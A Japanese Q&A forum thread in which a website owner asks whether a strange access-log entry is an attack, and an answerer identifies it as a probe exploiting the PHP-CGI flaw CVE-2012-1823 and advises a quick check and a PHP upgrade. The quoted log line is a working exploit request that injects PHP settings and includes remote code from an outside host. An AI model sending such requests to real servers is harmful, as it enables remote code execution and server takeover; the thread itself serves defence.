これってサイバー攻撃でしょうか？

私が運営するWebサイト（www.example.comとします）に、以下のようなアクセスログが残っていました。

www.example.com/?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt

最後のIPアドレス「61.19.253.26」を調べると、タイ国のもののようですが、使用されていないようです。

これってサイバー攻撃の一種なのでしょうか？
何かしらの情報が盗まれたりした痕跡なのでしょうか？

自分で、ブラウザに上記URLを打ち込んだのですが、反応がありませんでした。

ちなみに、私のサイトはレンタルの共有サーバーで運用しています。
また、全てPHPで作成しており、ルートのindex.phpにパラメータを与えることで、全てのページを表示させるようにしています。
なお、index.phpとcssや画像以外は非公開ディレクトリに置いています。

また、同一契約で上記と同じ公開ディレクトリに複数のWebサイトを作っています。

盗まれたものは取り返せないので仕方がないのですが、危険な攻撃であればセキュリティを高める手段を講じる必要があると感じています。

上記アクセスで何が行われたのか、どのような危険があるのか、ご存じの方がいらっしゃいましたらご教授いただければ幸いです。
よろしくお願いいたします。

No.1 ベストアンサー 回答者： Picosoft 回答日時： 2013/10/18 02:14

「CVE-2012-1823」として報告されているPHPの脆弱性を利用した手口であり、

攻撃を試みた形跡であることは間違いありません。

ブラウザで
　http://www.example.com/?-s
と打ち込んだ結果、PHPソースが表示されてしまうようなら脆弱性があります。
この脆弱性を利用するとサーバ上で好き勝手にコードが実行できるようになるため、
攻撃者が情報を盗んだり、サーバーを乗っ取ったりしてしまう恐れがあります。

で、今回のアクセスログですが、echo.txtの中身がecho文1つのみのPHPコードでしたので、
「攻撃が成立するかどうかの小手調べ」が行われたと思われます。
似たようなログが他になければ、攻撃は失敗に終わったと考えて差し支えありません。


PHPのバージョンを最新のものに上げておけばとりあえずは安心かと思います。

この脆弱性の詳細については
http://blog.tokumaru.org/2012/05/php-cgi-remote- …
http://www.atmarkit.co.jp/news/201205/10/php543. …
などをご覧ください。

この回答へのお礼

詳しいご回答＆ご解説ありがとうございました。
/?-sでアクセスしたところ、ソースは表示されず、画面も遷移しませんでした。

同様のアクセスはこの数日の間に２回だけでしたので、ひとまず安心しました。（接続IPは異なりました）

レンタルサーバなのでPHPのバージョンは変更できませんが、大手なのでおそらく大丈夫だと思います。

ありがとうございました。

お礼日時：2013/10/18 23:15